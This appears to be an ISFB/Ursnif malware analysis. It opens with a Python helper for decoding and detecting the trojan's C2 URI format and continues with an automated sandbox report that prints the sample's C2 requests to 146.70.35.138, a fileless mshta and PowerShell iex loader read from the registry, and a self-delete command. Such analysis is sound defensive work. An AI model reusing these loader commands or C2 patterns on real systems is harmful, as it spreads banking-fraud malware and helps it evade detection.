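        segments.append(text[i:i + n])
        i += n
    return f"/{prefix}/{'/'.join(segments)}.{ext}"


def isfb_decode_uri(uri: str) -> bytes:
    """Reverse the layout: drop prefix, extension and separators, undo the
    '_2X' substitutions, base64-decode. Returns the still-encrypted blob."""
    m = URI_RE.match(uri)
    if not m:
        raise ValueError("not an ISFB-style URI")
    text = m.group("body").replace("/", "")
    for ch, tok in SUBST.items():
        text = text.replace(tok, ch)
    text += "=" * (-len(text) % 4)      # tolerate stripped padding
    return base64.b64decode(text, validate=True)


def looks_like_isfb_uri(uri: str, min_segments: int = 8) -> bool:
    """Structural check in the spirit of the ET signatures: a deep path whose
    segments contain only base64 alphabet plus '_2B'/'_2F' tokens."""
    m = URI_RE.match(uri)
    if not m:
        return False
    segments = m.group("body").split("/")
    body = "".join(segments)
    return (len(segments) >= min_segments
            and ("_2B" in body or "_2F" in body)
            and re.fullmatch(r"[A-Za-z0-9_]+", body) is not None)


if __name__ == "__main__":
    sample = isfb_encode_uri(bytes(range(256)))
    print(sample)
    print(len(isfb_decode_uri(sample)), "bytes recovered")
    print("report URI matches layout:", looks_like_isfb_uri(REPORT_URI))
```

The decoder removes every "/" before undoing the substitutions, which is why the split-token case in the first URI is harmless; a decoder that worked segment by segment would lose that byte. The classifier is deliberately loose (the real rules also check the request method, extension and header layout), so treat it as a triage filter over proxy logs rather than as a replacement for the Snort signatures.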
Source: unknown | TCP traffic detected without corresponding DNS query: 146.70.35.138 (reported 50 times)
Source: rundll32.exe, 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: rundll32.exe, 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000021.00000000.523469701.00000000026D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.572314670.00000000026D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.526704286.00000000026D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.562762119.00000000026D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobY
Source: powershell.exe, 00000014.00000002.767708483.000002DC67F3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000014.00000002.767419442.000002DC67D31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000014.00000002.767708483.000002DC67F3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000014.00000002.767708483.000002DC67F3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE4CC6 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError
                      Source: global trafficHTTP traffic detected: GET /phpadmin/amEwUCMy/zQvTSnELMCHIJfWA9A7NF2J/B_2FgTN3w5/bDUz7M_2FQ_2FvsyQ/_2FoZnlV0ztm/G4pVInXE2v2/3DjsF_2BN_2F7_/2FqxWA7q0ZWwUgJ9q_2B6/oG7o48SwKb_2FuN4/koQCfS1rrGeWSn9/gvwn1WY7oRq54G3QzL/QoP8Nx_2F/m8EC_2FPKp_2B2QIRT4a/hKoi_2FT5FiIh7mNlS7/jciRuxpI3KdaM19hmR8F9V/NOK7C_2BauAdB/emv_2BixRfY4926/zZ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/1p0semBcWFOiJ/VuHxHtu5/AN830nRWQ1d2xctaoA3KLHR/918Z9VEhPV/P8ohXldFwnNmepL6Q/uKTfc4fmSrkK/BfYNKcK_2Bx/w_2FA1ltM5KCgm/3UT06OWaufeDOP8Oq_2FL/oIF6meLVrySmPHH0/RIFJ_2FHuhWguIS/4hvBrDpXZ_2FB9M_2F/VjlCK_2FC/TflkNLJtzRIEzaze5_2F/wDsLbDghNL5li48V5rm/4qe0lRbO5_2FdP6RKk3aIg/j40b09twfw_2F/PdHkwNcC/i0_2BVuZ/L.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/sJOLDU_2FhOUoo/k46SW66GV6I1pQKjWA9TE/PWpby4hvIkOnAKsS/x0Aee5T7Xyol_2F/mHBJFq72pa7ZryIdq5/j7jpLfh_2/B9C_2B8rr1N7pwYs7Hbz/HAjnG5DvkxUUwsnvZ2H/7mKa3lBAhH1k0Vg5CBUe72/SPp1Kc_2FZv6K/7UGQxmIh/q1dxSy205p9HqV1EWhDaIi0/wpq760vWJe/2wvTRaTBNSXKAlgWL/PHcpI3wJ6a_2/BROCpFJpoTX/N2ZuQyATVgKAeO/_2Fd3SdF.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: Yara matchFile source: 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391081269.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.439315042.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.436001223.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438329210.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391236122.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390852806.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390783473.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390963737.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391015018.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390663420.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391212771.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7148, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.4de0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5456940.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.438131198.00000000053AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.517494573.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.515954749.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.516723035.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438206007.0000000005429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.566002484.0000000004C79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.568306199.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.569427566.000000000512F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      Source: Yara matchFile source: 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391081269.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.439315042.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.436001223.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438329210.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391236122.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390852806.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390783473.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390963737.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391015018.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390663420.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391212771.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7148, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.4de0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5456940.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.438131198.00000000053AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.517494573.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.515954749.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.516723035.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438206007.0000000005429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.566002484.0000000004C79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.568306199.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.569427566.000000000512F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE3072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

                      System Summary

                      Source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: HxEWwh74qT.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 608
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE821C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE198A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE475F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00808C30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00803B64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F8D20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00816814
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080F83C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081A84C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081B7AC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F47E4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080B910
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00816138
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F711C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00813248
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007FC96C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081099C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081C1CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007FD2EC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081833C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F1338
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F4338
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007FA2F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F1AF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00816C40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00808454
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F4C54
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080D36C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081AB84
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007FDBAC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC008043BC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00815BD4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00818BD8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080FCEC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00800500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00807D50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007FE464
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080DC8C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0081CCC4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080ADF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00817650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080E578
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00819708
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC0080BF14
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00801678
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F1F34
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE3A9C NtMapViewOfSection
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE4695 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE25D7 GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE8441 NtQueryVirtualMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC008010B4 NtMapViewOfSection
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F59D4 NtCreateSection
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F79AC NtSetInformationProcess,CreateRemoteThread,ResumeThread
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F2B58 NtWriteVirtualMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00817D48 NtQueryInformationProcess
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC007F8D20 NtSetContextThread,NtUnmapViewOfSection
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC00817DB4 NtQueryInformationToken,NtQueryInformationToken
                      Source: HxEWwh74qT.dllBinary or memory string: OriginalFilenamerpcapd.exe0 vs HxEWwh74qT.dll
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: HxEWwh74qT.dllVirustotal: Detection: 36%
                      Source: HxEWwh74qT.dllReversingLabs: Detection: 30%
                      Source: HxEWwh74qT.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 608
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 604
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 612
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD841.tmp" "c:\Users\user\AppData\Local\Temp\pkbugtxo\CSC26C720E9EBC041F086604EECC7DD3CDD.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESED31.tmp" "c:\Users\user\AppData\Local\Temp\lboh4mlq\CSC3DF21D054A9F4C66BF1FA9CD771B1F79.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1"
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220422Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8D1.tmpJump to behavior
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@28/29@0/2
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
